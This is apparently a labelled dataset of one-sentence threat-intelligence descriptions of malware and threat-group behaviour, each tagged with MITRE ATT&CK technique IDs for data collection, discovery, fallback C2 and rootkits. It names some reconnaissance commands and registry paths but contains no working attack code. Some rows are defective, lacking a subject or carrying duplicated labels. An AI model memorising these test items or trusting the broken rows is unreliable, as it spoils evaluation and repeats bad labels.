{"text1":"FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on the local system. FLASHFLOOD will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. FLASHFLOOD also collects information stored in the Windows Address Book.","labels":"['T1005']"}
{"text1":"FlawedAmmyy has collected information and files from a compromised machine.","labels":"['T1005']"}
{"text1":"Forfiles can be used to act on (ex: copy, move, etc.) files\/directories in a system during (ex: copy files into a staging area before).","labels":"['T1005']"}
{"text1":"FrameworkPOS can collect elements related to credit card data from process memory.","labels":"['T1005']"}
{"text1":"Frankenstein has enumerated hosts via Empire, gathering various local system information.","labels":"['T1005']"}
{"text1":"FunnyDream can upload files from victims' machines.","labels":"['T1005']"}
{"text1":"Gamaredon Group has collected files from infected systems and uploaded them to a C2 server.","labels":"['T1005']"}
{"text1":"Goopy has the ability to exfiltrate documents from infected systems.","labels":"['T1005']"}
{"text1":"GravityRAT steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","labels":"['T1005']"}
{"text1":"Green Lambert can collect data from a compromised host.","labels":"['T1005']"}
{"text1":"GrimAgent can collect data and files from a compromised host.","labels":"['T1005']"}
{"text1":"IceApple can collect files, passwords, and other data from a compromised host.","labels":"['T1005']"}
{"text1":"InvisiMole can collect data from the system, and can monitor changes in specified directories.","labels":"['T1005']"}
{"text1":"Ixeshe can collect data from a local system.","labels":"['T1005']"}
{"text1":"KGH_SPY can send a file containing victim system information to C2.","labels":"['T1005']"}
{"text1":"KONNI has stored collected information and discovered processes in a tmp file.","labels":"['T1005']"}
{"text1":"Kazuar uploads files from a specified directory to the C2 server.","labels":"['T1005']"}
{"text1":"Ke3chang gathered information and files from local directories for exfiltration.","labels":"['T1005']"}
{"text1":"Kevin can upload logs and other data from a compromised host.","labels":"['T1005']"}
{"text1":"Koadic can download files off the target system to send back to the server.","labels":"['T1005']"}
{"text1":"Lazarus Group has collected data and files from compromised networks.","labels":"['T1005']"}
{"text1":"LightNeuron can collect files from a local system.","labels":"['T1005']"}
{"text1":"Linfo creates a backdoor through which remote attackers can obtain data from local systems.","labels":"['T1005']"}
{"text1":"MCMD has the ability to upload files from an infected device.","labels":"['T1005']"}
{"text1":"MacMa can collect then exfiltrate files from the compromised system.","labels":"['T1005']"}
{"text1":"Machete searches the File system for files of interest.","labels":"['T1005']"}
{"text1":"Magic Hound has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine.","labels":"['T1005']"}
{"text1":"Milan can upload files from a compromised host.","labels":"['T1005']"}
{"text1":"Misdat has collected files and data from a compromised host.","labels":"['T1005']"}
{"text1":"Nebulae has the capability to upload collected files to C2.","labels":"['T1005']"}
{"text1":"Neoichor can upload files from a victim's machine.","labels":"['T1005']"}
{"text1":"Operation Wocao has exfiltrated files and directories of interest from the targeted system.","labels":"['T1005']"}
{"text1":"Out1 can copy files and Registry data from compromised hosts.","labels":"['T1005']"}
{"text1":"P.A.S. Webshell has the ability to copy files on a compromised host.","labels":"['T1005']"}
{"text1":"PUNCHTRACK scrapes memory for properly formatted payment card data.","labels":"['T1005']"}
{"text1":"Patchwork collected and exfiltrated files from the infected system.","labels":"['T1005']"}
{"text1":"Pillowmint has collected credit card data using native API functions.","labels":"['T1005']"}
{"text1":"PingPull can collect data from a compromised host.","labels":"['T1005']"}
{"text1":"PoisonIvy creates a backdoor through which remote attackers can steal system information.","labels":"['T1005']"}
{"text1":"PowerLess has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines.","labels":"['T1005']"}
{"text1":"PowerSploit contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.","labels":"['T1005']"}
{"text1":"Proxysvc searches the local system and gathers data.","labels":"['T1005']"}
{"text1":"QuietSieve can collect files from a compromised host.","labels":"['T1005']"}
{"text1":"RainyDay can use a file exfiltration tool to collect recently changed files on a compromised host.","labels":"['T1005']"}
{"text1":"Ramsay can collect Microsoft Word documents from the target's file system, as well as \".txt\", \".doc\", and \".xls\" files from the Internet Explorer cache.","labels":"['T1005']"}
{"text1":"RawPOS dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data.","labels":"['T1005']"}
{"text1":"SDBbot has the ability to access the file system on a compromised host.","labels":"['T1005']"}
{"text1":"SLOTHFULMEDIA has uploaded files and information from victim machines.","labels":"['T1005']"}
{"text1":"STARWHALE can collect data from an infected local host.","labels":"['T1005']"}
{"text1":"SUNBURST collected information from a compromised host.","labels":"['T1005']"}
{"text1":"Saint Bot can collect files and information from a compromised host.","labels":"['T1005']"}
{"text1":"Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts.","labels":"['T1005']"}
{"text1":"Shark can upload files to its C2.","labels":"['T1005']"}
{"text1":"ShimRat has the capability to upload collected files to a C2.","labels":"['T1005']"}
{"text1":"SideTwist has the ability to upload files from a compromised host.","labels":"['T1005']"}
{"text1":"SombRAT has collected data and files from a compromised host.","labels":"['T1005']"}
{"text1":"Stealth Falcon malware gathers data from the local victim system.","labels":"['T1005']"}
{"text1":"StrifeWater can collect data from a compromised host.","labels":"['T1005']"}
{"text1":"Taidoor can upload data and files from a victim's machine.","labels":"['T1005']"}
{"text1":"TajMahal has the ability to steal documents from the local system including the print spooler queue.","labels":"['T1005']"}
{"text1":"Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.","labels":"['T1005', 'T1119']"}
{"text1":"Tomiris has the ability to collect recent files matching a hardcoded list of extensions prior to exfiltration.","labels":"['T1005']"}
{"text1":"Ursnif has collected files from victim machines, including certificates and cookies.","labels":"['T1005']"}
{"text1":"WellMail can exfiltrate files from the victim machine.","labels":"['T1005']"}
{"text1":"WellMess can send files from the victim machine to C2.","labels":"['T1005']"}
{"text1":"Windigo has used a script to gather credentials in files left on disk by OpenSSH backdoors.","labels":"['T1005']"}
{"text1":"XCSSET collects contacts and application data from files in Desktop, Documents, Downloads, Dropbox, and WeChat folders.","labels":"['T1005']"}
{"text1":"Zox has the ability to upload files from a targeted system.","labels":"['T1005']"}
{"text1":"ZxShell can transfer files from a compromised host.","labels":"['T1005']"}
{"text1":"ZxxZ can collect data from a compromised host.","labels":"['T1005']"}
{"text1":"ccf32 can collect files from a compromised host.","labels":"['T1005']"}
{"text1":"creates a backdoor through which remote attackers can steal system information.","labels":"['T1005', 'T1005']"}
{"text1":"esentutl can be used to collect data from local file systems.","labels":"['T1005']"}
{"text1":"menuPass has collected various files from the compromised computers.","labels":"['T1005']"}
{"text1":"njRAT can collect data from a local system.","labels":"['T1005']"}
{"text1":"xCaon has uploaded files from victims' machines.","labels":"['T1005']"}
{"text1":"yty collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.","labels":"['T1005']"}
{"text1":"After compromising a victim, Poseidon Group discovers all running services.","labels":"['T1007']"}
{"text1":"Aquatic Panda has attempted to discover services for third party EDR products.","labels":"['T1007']"}
{"text1":"BBSRAT can query service configuration information.","labels":"['T1007']"}
{"text1":"BRONZE BUTLER has used TROJ_GETVERSION to discover system services.","labels":"['T1007']"}
{"text1":"Babuk can enumerate all services running on a compromised host.","labels":"['T1007']"}
{"text1":"BitPaymer can enumerate existing Windows services on the host that are configured to run as LocalSystem.","labels":"['T1007']"}
{"text1":"Caterpillar WebShell can obtain a list of the services from a system.","labels":"['T1007']"}
{"text1":"Chimera has used \"net start\" and \"net use\" for system service discovery.","labels":"['T1007']"}
{"text1":"Cobalt Strike can enumerate services on compromised hosts.","labels":"['T1007']"}
{"text1":"Comnie runs the command: \"net start >> %TEMP%\\info.dat\" on a victim.","labels":"['T1007']"}
{"text1":"Cuba can query service status using \"QueryServiceStatusEx\" function.","labels":"['T1007']"}
{"text1":"During Operation CuckooBees, the threat actors used the `net start` command as part of their initial reconnaissance.","labels":"['T1007']"}
{"text1":"During Operation Wocao, threat actors used the `tasklist` command to search for one of its backdoors.","labels":"['T1007']"}
{"text1":"Earth Lusca has used Tasklist to obtain information from a compromised host.","labels":"['T1007', 'T1057']"}
{"text1":"Emissary has the capability to execute the command \"net start\" to interact with services.","labels":"['T1007']"}
{"text1":"GravityRAT has a feature to list the available services on the system.","labels":"['T1007']"}
{"text1":"GreyEnergy enumerates all Windows services.","labels":"['T1007']"}
{"text1":"Heyoka Backdoor can check if it is running as a service on a compromised host.","labels":"['T1007']"}
{"text1":"HotCroissant has the ability to retrieve a list of services on the infected host.","labels":"['T1007']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can monitor services.","labels":"['T1007']"}
{"text1":"JPIN can list running services.","labels":"['T1007']"}
{"text1":"Ke3chang performs service discovery using \"net start\" commands.","labels":"['T1007']"}
{"text1":"Kimsuky has used an instrumentor script to gather the names of all services running on a victim's system.","labels":"['T1007']"}
{"text1":"Kwampirs collects a list of running services with the command \"tasklist \/svc\".","labels":"['T1007']"}
{"text1":"LookBack can enumerate services on the victim machine.","labels":"['T1007']"}
{"text1":"OilRig has used \"sc query\" on a victim to gather information about services.","labels":"['T1007']"}
{"text1":"Operation Wocao has used the \"tasklist\" command to search for one of its backdoors.","labels":"['T1007']"}
{"text1":"RATANKBA uses \"tasklist \/svc\" to display running tasks.","labels":"['T1007']"}
{"text1":"REvil can enumerate active services.","labels":"['T1007']"}
{"text1":"SILENTTRINITY can search for modifiable services that could be used for privilege escalation.","labels":"['T1007']"}
{"text1":"SLOTHFULMEDIA has the capability to enumerate services.","labels":"['T1007']"}
{"text1":"SynAck enumerates all running services.","labels":"['T1007']"}
{"text1":"The \"net start\" command can be used in Net to find information about Windows services.","labels":"['T1007']"}
{"text1":"TrickBot collects a list of install programs and services on the system\u2019s machine.","labels":"['T1007']"}
{"text1":"Turla surveys a system upon check-in to discover running services and associated processes using the \"tasklist \/svc\" command.","labels":"['T1007']"}
{"text1":"Ursnif has gathered information about running services.","labels":"['T1007']"}
{"text1":"Volgmer queries the system to identify existing services.","labels":"['T1007']"}
{"text1":"WINERACK can enumerate services.","labels":"['T1007']"}
{"text1":"ZLib has the ability to discover and manipulate Windows services.","labels":"['T1007']"}
{"text1":"ZxShell can check the services on the system.","labels":"['T1007']"}
{"text1":"admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to obtain information about services: \"net start >> %temp%\\download\"","labels":"['T1007']"}
{"text1":"jRAT can list local services.","labels":"['T1007']"}
{"text1":"APT41 used the Steam community page as a fallback mechanism for C2.","labels":"['T1008']"}
{"text1":"Anchor can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.","labels":"['T1008']"}
{"text1":"AppleSeed can use a second channel for C2 when the primary channel is in upload mode.","labels":"['T1008']"}
{"text1":"BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server.","labels":"['T1008']"}
{"text1":"BlackEnergy has the capability to communicate over a backup channel via plus.google.com.","labels":"['T1008']"}
{"text1":"Bumblebee can use backup C2 servers if the primary server fails.","labels":"['T1008']"}
{"text1":"CHOPSTICK can switch to a new C2 channel if the current one is broken.","labels":"['T1008']"}
{"text1":"Carbanak\u2019s Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.","labels":"['T1008']"}
{"text1":"Cardinal RAT can communicate over multiple C2 host and port combinations.","labels":"['T1008']"}
{"text1":"CharmPower can change its C2 channel once every 360 loops by retrieving a new domain from the actors\u2019 S3 bucket.","labels":"['T1008']"}
{"text1":"Crutch has used a hardcoded GitHub repository as a fallback channel.","labels":"['T1008']"}
{"text1":"During Night Dragon, threat actors used company extranet servers as secondary C2 servers.","labels":"['T1008']"}
{"text1":"DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.","labels":"['T1008']"}
{"text1":"Ebury has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.","labels":"['T1008']"}
{"text1":"Exaramel for Linux can attempt to find a new C2 server if it receives an error.","labels":"['T1008']"}
{"text1":"FatDuke has used several C2 servers per targeted organization.","labels":"['T1008']"}
{"text1":"Gelsemium can use multiple domains and protocols in C2.","labels":"['T1008']"}
{"text1":"HOPLIGHT has multiple C2 channels in place in case one fails.","labels":"['T1008']"}
{"text1":"InvisiMole has been configured with several servers available for alternate C2 communications.","labels":"['T1008']"}
{"text1":"Kazuar can accept multiple URLs for C2 servers.","labels":"['T1008']"}
{"text1":"Kevin can assign hard-coded fallback domains for C2.","labels":"['T1008']"}
{"text1":"Kwampirs uses a large list of C2 servers that it cycles through until a successful connection is established.","labels":"['T1008']"}
{"text1":"Linfo creates a backdoor through which remote attackers can change C2 servers.","labels":"['T1008']"}
{"text1":"Machete has sent data over HTTP if FTP failed, and has also used a fallback server.","labels":"['T1008']"}
{"text1":"MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.","labels":"['T1008']"}
{"text1":"Mis-Type first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.","labels":"['T1008']"}
{"text1":"NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP\/6000.","labels":"['T1008']"}
{"text1":"PipeMon can switch to an alternate C2 domain when a particular date has been reached.","labels":"['T1008']"}
{"text1":"QUADAGENT uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.","labels":"['T1008']"}
{"text1":"RDAT has used HTTP if DNS C2 communications were not functioning.","labels":"['T1008']"}
{"text1":"RainyDay has the ability to switch between TCP and HTTP for C2 if one method is not working.","labels":"['T1008']"}
{"text1":"S-Type primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails.","labels":"['T1008']"}
{"text1":"Shark can update its configuration to use a different C2 server.","labels":"['T1008']"}
{"text1":"SideTwist has primarily used port 443 for C2 but can use port 80 as a fallback.","labels":"['T1008']"}
{"text1":"SslMM has a hard-coded primary and backup C2 string.","labels":"['T1008']"}
{"text1":"TAINTEDSCRIBE can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.","labels":"['T1008']"}
{"text1":"The C2 server used by XTunnel provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.","labels":"['T1008']"}
{"text1":"TinyTurla can go through a list of C2 server IPs and will try to register with each until one responds.","labels":"['T1008']"}
{"text1":"TrickBot can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.","labels":"['T1008']"}
{"text1":"Valak can communicate over multiple C2 hosts.","labels":"['T1008']"}
{"text1":"Aria-body has the ability to identify the titles of running windows on a compromised host.","labels":"['T1010']"}
{"text1":"Attor can obtain application window titles and then determines which windows to perform Screen Capture on.","labels":"['T1010']"}
{"text1":"Cadelspy has the ability to identify open windows on the compromised host.","labels":"['T1010']"}
{"text1":"Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on.","labels":"['T1010']"}
{"text1":"DarkWatchman reports window names along with keylogger information to provide application context.","labels":"['T1010']"}
{"text1":"Flagpro can check the name of the window displayed on the system.","labels":"['T1010']"}
{"text1":"FunnyDream has the ability to discover application windows via execution of `EnumWindows`.","labels":"['T1010']"}
{"text1":"Grandoreiro can identify installed security tools based on window names.","labels":"['T1010']"}
{"text1":"HotCroissant has the ability to list the names of all open windows on the infected host.","labels":"['T1010']"}
{"text1":"InvisiMole can enumerate windows and child windows on a compromised host.","labels":"['T1010']"}
{"text1":"Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.","labels":"['T1010']"}
{"text1":"Metamorfo can enumerate all windows on the victim\u2019s machine.","labels":"['T1010']"}
{"text1":"NETWIRE can discover and close windows on controlled systems.","labels":"['T1010']"}
{"text1":"NetTraveler reports window names along with keylogger information to provide application context.","labels":"['T1010']"}
{"text1":"PLEAD has the ability to list open windows on the compromised host.","labels":"['T1010']"}
{"text1":"PoisonIvy captures window titles.","labels":"['T1010']"}
{"text1":"PowerDuke has a command to get text of the current foreground window.","labels":"['T1010']"}
{"text1":"ROKRAT can use  the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.","labels":"['T1010']"}
{"text1":"SOUNDBITE is capable of enumerating application windows.","labels":"['T1010']"}
{"text1":"The discovery modules used with Duqu can collect information on open windows.","labels":"['T1010']"}
{"text1":"Trojan.Karagany can monitor the titles of open windows to identify specific keywords.","labels":"['T1010']"}
{"text1":"WINERACK can enumerate active windows.","labels":"['T1010']"}
{"text1":"captures window titles.","labels":"['T1010', 'T1010']"}
{"text1":"njRAT gathers information about opened windows during the initial infection.","labels":"['T1010']"}
{"text1":"A Threat Group-3390 tool can read and decrypt stored Registry values.","labels":"['T1012']"}
{"text1":"A variant of HOPLIGHT hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key \"SYSTEM\\CurrentControlSet\\Control\\Lsa Name\".","labels":"['T1012']"}
{"text1":"ADVSTORESHELL can enumerate registry keys.","labels":"['T1012']"}
{"text1":"APT32's backdoor can query the Windows Registry to gather system information.","labels":"['T1012']"}
{"text1":"APT39 has used various strains of malware to query the Registry.","labels":"['T1012']"}
{"text1":"Attor has opened the registry and performed query searches.","labels":"['T1012']"}
{"text1":"BACKSPACE is capable of enumerating and making modifications to an infected system's Registry.","labels":"['T1012']"}
{"text1":"BabyShark has executed the \"reg query\" command for \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\".","labels":"['T1012']"}
{"text1":"Bankshot searches for certain Registry keys to be configured before executing the payload.","labels":"['T1012']"}
{"text1":"Bazar can query \"Windows\\CurrentVersion\\Uninstall\" for installed applications.","labels":"['T1012']"}
{"text1":"BendyBear can query the host's Registry key at \"HKEY_CURRENT_USER\\Console\\QuickEdit\" to retrieve data.","labels":"['T1012']"}
{"text1":"Brave Prince gathers information about the Registry.","labels":"['T1012']"}
{"text1":"Bumblebee can check the Registry for specific keys.","labels":"['T1012']"}
{"text1":"CHOPSTICK provides access to the Windows Registry, which can be used to gather information.","labels":"['T1012']"}
{"text1":"Carbanak checks the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" for proxy configurations information.","labels":"['T1012']"}
{"text1":"Carberp has searched the Image File Execution Options registry key for \"Debugger\" within every subkey.","labels":"['T1012']"}
{"text1":"CharmPower has the ability to enumerate `Uninstall` registry values.","labels":"['T1012']"}
{"text1":"Clambling has the ability to enumerate Registry keys, including \"KEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\\strDataDir\" to search for a bitcoin wallet.","labels":"['T1012']"}
{"text1":"Cobalt Strike can query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Excel Version>\\Excel\\Security\\AccessVBOM\\\"  to determine if the security setting for restricting default programmatic access is enabled.","labels":"['T1012']"}
{"text1":"ComRAT can check the default browser by querying \"HKCR\\http\\shell\\open\\command\".","labels":"['T1012']"}
{"text1":"Denis queries the Registry for keys and values.","labels":"['T1012']"}
{"text1":"Dragonfly 2.0 queried the Registry to identify victim information.","labels":"['T1012']"}
{"text1":"Dragonfly has queried the Registry to identify victim information.","labels":"['T1012']"}
{"text1":"Epic uses the \"rem reg query\" command to obtain values from Registry keys.","labels":"['T1012']"}
{"text1":"FELIXROOT queries the Registry for specific keys for potential privilege escalation and proxy information. FELIXROOT has also used WMI to query the Windows Registry.","labels":"['T1012']"}
{"text1":"FatDuke can get user agent strings for the default browser from \"HKCU\\Software\\Classes\\http\\shell\\open\\command\".","labels":"['T1012']"}
{"text1":"Gelsemium can open random files and Registry keys to obscure malware behavior from sandbox analysis.","labels":"['T1012']"}
{"text1":"Gold Dragon enumerates registry keys with the command \"regkeyenum\" and obtains information for the Registry key \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\".","labels":"['T1012']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.","labels":"['T1012']"}
{"text1":"Industroyer has a data wiper component that enumerates keys in the Registry \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\".","labels":"['T1012']"}
{"text1":"InvisiMole can enumerate Registry values, keys, and data.","labels":"['T1012']"}
{"text1":"JPIN can enumerate Registry keys.","labels":"['T1012']"}
{"text1":"Kimsuky has obtained specific Registry keys and values on a compromised host.","labels":"['T1012']"}
{"text1":"Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key:\"HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\".","labels":"['T1012']"}
{"text1":"Lucifer can check for existing stratum cryptomining information in \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\spreadCpuXmr \u2013 %stratum info%\".","labels":"['T1012']"}
{"text1":"Milan can query `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid` to retrieve the machine GUID.","labels":"['T1012']"}
{"text1":"Mori can read data from the Registry including from `HKLM\\Software\\NFC\\IPA` and\n`HKLM\\Software\\NFC\\`.","labels":"['T1012']"}
{"text1":"OSInfo queries the registry to look for information about Terminal Services.","labels":"['T1012']"}
{"text1":"OilRig has used \"reg query \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\u201d\" on a victim to query the Registry.","labels":"['T1012']"}
{"text1":"Operation Wocao has queried the registry to detect recent PuTTY sessions.","labels":"['T1012']"}
{"text1":"POWERSOURCE queries Registry keys in preparation for setting Run keys to achieve persistence.","labels":"['T1012']"}
{"text1":"PcShare can search the registry files of a compromised host.","labels":"['T1012']"}
{"text1":"Pillowmint has used shellcode which reads code stored in the registry keys \"\\REGISTRY\\SOFTWARE\\Microsoft\\DRM\" using the native Windows API as well as read \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\" as part of its C2.","labels":"['T1012']"}
{"text1":"Proxysvc gathers product names from the Registry key: \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName\" and the processor description from the Registry key \"HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0 ProcessorNameString\".","labels":"['T1012']"}
{"text1":"ROKRAT can access the \"HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData\" Registry key to obtain the System manufacturer value to identify the machine type.","labels":"['T1012']"}
{"text1":"Reaver queries the Registry to determine the correct Startup path to use for persistence.","labels":"['T1012']"}
{"text1":"Rising Sun has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\\MICROSOFT\\Windows NT\\ CurrentVersion | ProductName`.","labels":"['T1012']"}
{"text1":"SILENTTRINITY can use the `GetRegValue` function to check Registry keys within `HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated` and `HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives.","labels":"['T1012']"}
{"text1":"Shark can query `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid` to retrieve the machine GUID.","labels":"['T1012']"}
{"text1":"Sibot has queried the registry for proxy server information.","labels":"['T1012']"}
{"text1":"Stealth Falcon malware attempts to determine the installed version of .NET by querying the Registry.","labels":"['T1012']"}
{"text1":"StoneDrill has looked in the registry to find the default browser path.","labels":"['T1012']"}
{"text1":"TEARDROP checked that \"HKU\\SOFTWARE\\Microsoft\\CTF\" existed before decoding its embedded payload.","labels":"['T1012']"}
{"text1":"Taidoor can query the Registry on compromised hosts using \"RegQueryValueExA\".","labels":"['T1012']"}
{"text1":"TinyTurla can query the Registry for its configuration information.","labels":"['T1012']"}
{"text1":"Turla surveys a system upon check-in to discover information in the Windows Registry with the \"reg query\" command. Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes .","labels":"['T1012']"}
{"text1":"Valak can use the Registry for code updates and to collect credentials.","labels":"['T1012']"}
{"text1":"Volgmer checks the system for certain Registry keys.","labels":"['T1012']"}
{"text1":"WINDSHIELD can gather Registry values.","labels":"['T1012']"}
{"text1":"WastedLocker checks for specific registry keys related to the \"UCOMIEnumConnections\" and \"IActiveScriptParseProcedure32\" interfaces.","labels":"['T1012']"}
{"text1":"Waterbear can query the Registry key \"\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\"\" to see if the value `OracleOcilib` exists.","labels":"['T1012']"}
{"text1":"ZIRCONIUM has used a tool to query the Registry for proxy settings.","labels":"['T1012']"}
{"text1":"Zeus Panda checks for the existence of a Registry key and if it contains certain values.","labels":"['T1012']"}
{"text1":"ZxShell can query the netsvc group value data located in the svchost group Registry key.","labels":"['T1012']"}
{"text1":"ZxxZ can search the registry of a compromised host.","labels":"['T1012']"}
{"text1":"gh0st RAT has checked for the existence of a Service key to determine if it has already been installed on the system.","labels":"['T1012']"}
{"text1":"njRAT can read specific registry values.","labels":"['T1012']"}
{"text1":"APT28 has used a UEFI (Unified Extensible Firmware Interface) rootkit known as LoJax.","labels":"['T1014']"}
{"text1":"APT41 deployed rootkits on Linux systems.","labels":"['T1014']"}
{"text1":"Caterpillar WebShell has a module to use a rootkit on a system.","labels":"['T1014']"}
{"text1":"Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.","labels":"['T1014']"}
{"text1":"Ebury has used user mode rootkit techniques to remain hidden on the system.","labels":"['T1014']"}
{"text1":"HIDEDRV is a rootkit that hides certain operating system artifacts.","labels":"['T1014']"}
{"text1":"Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.","labels":"['T1014', 'T1542.001']"}
{"text1":"HiddenWasp uses a rootkit to hook and implement functions on the system.","labels":"['T1014']"}
{"text1":"LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.","labels":"['T1014', 'T1542.001']"}
{"text1":"PoisonIvy starts a rootkit from a malicious file dropped to disk.","labels":"['T1014']"}
{"text1":"Ramsay has included a rootkit to evade defenses.","labels":"['T1014']"}
{"text1":"Rocke has modified \/etc\/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.","labels":"['T1014', 'T1574.006']"}
{"text1":"Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.","labels":"['T1014']"}
{"text1":"Stuxnet uses a Windows rootkit to mask its binaries and other relevant files.","labels":"['T1014']"}
{"text1":"Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.","labels":"['T1014']"}
{"text1":"Uroburos is a rootkit used by Turla.","labels":"['T1014']"}
{"text1":"WarzoneRAT can include a rootkit to hide processes, files, and startup.","labels":"['T1014']"}
{"text1":"Winnti Group used a rootkit to modify typical server functionality.","labels":"['T1014']"}
{"text1":"Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.","labels":"['T1014']"}
{"text1":"A JHUHUGIT variant gathers network interface card information.","labels":"['T1016']"}
{"text1":"A keylogging tool used by APT3 gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.","labels":"['T1016']"}
{"text1":"APT1 used the \"ipconfig \/all\" command to gather network configuration information.","labels":"['T1016']"}
{"text1":"APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"APT41 collected MAC addresses from victim machines.","labels":"['T1016']"}
{"text1":"Action RAT has the ability to collect the MAC address of an infected host.","labels":"['T1016']"}
{"text1":"AdFind can extract subnet information from Active Directory.","labels":"['T1016']"}
{"text1":"Agent Tesla can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.","labels":"['T1016']"}
{"text1":"Agent.btz collects the network adapter\u2019s IP and MAC address as well as IP addresses of the network adapter\u2019s default gateway, primary\/secondary WINS, DHCP, and DNS servers, and saves them into a log file.","labels":"['T1016']"}
{"text1":"Amadey can identify the IP address of a victim machine.","labels":"['T1016']"}
{"text1":"AppleSeed can identify the IP of a targeted system.","labels":"['T1016']"}
{"text1":"Astaroth collects the external IP address from the system.","labels":"['T1016']"}
{"text1":"Azorult can collect host IP information from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"BADCALL collects the network adapter information.","labels":"['T1016']"}
{"text1":"BADFLICK has captured victim IP address details.","labels":"['T1016']"}
{"text1":"BLINDINGCAN has collected the victim machine's local IP address information and MAC address.","labels":"['T1016']"}
{"text1":"Backdoor.Oldrea collects information about the Internet adapter configuration.","labels":"['T1016']"}
{"text1":"Bazar can collect the IP address and NetBIOS name of an infected machine.","labels":"['T1016']"}
{"text1":"BlackEnergy has gathered information about network IP configurations using ipconfig.exe and about routing tables using route.exe.","labels":"['T1016']"}
{"text1":"Bonadan can find the external IP address of the infected host.","labels":"['T1016']"}
{"text1":"BoxCaon can collect the victim's MAC address by using the \"GetAdaptersInfo\" API.","labels":"['T1016']"}
{"text1":"Calisto runs the \"ifconfig\" command to obtain the IP address from the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"Carbon can collect the IP address of the victims and other computers on the network using the commands: \"ipconfig -all\" \"nbtstat -n\", and \"nbtstat -s\".","labels":"['T1016']"}
{"text1":"Catchamas gathers the Mac address, IP address, and the network adapter information from the victim\u2019s machine.","labels":"['T1016']"}
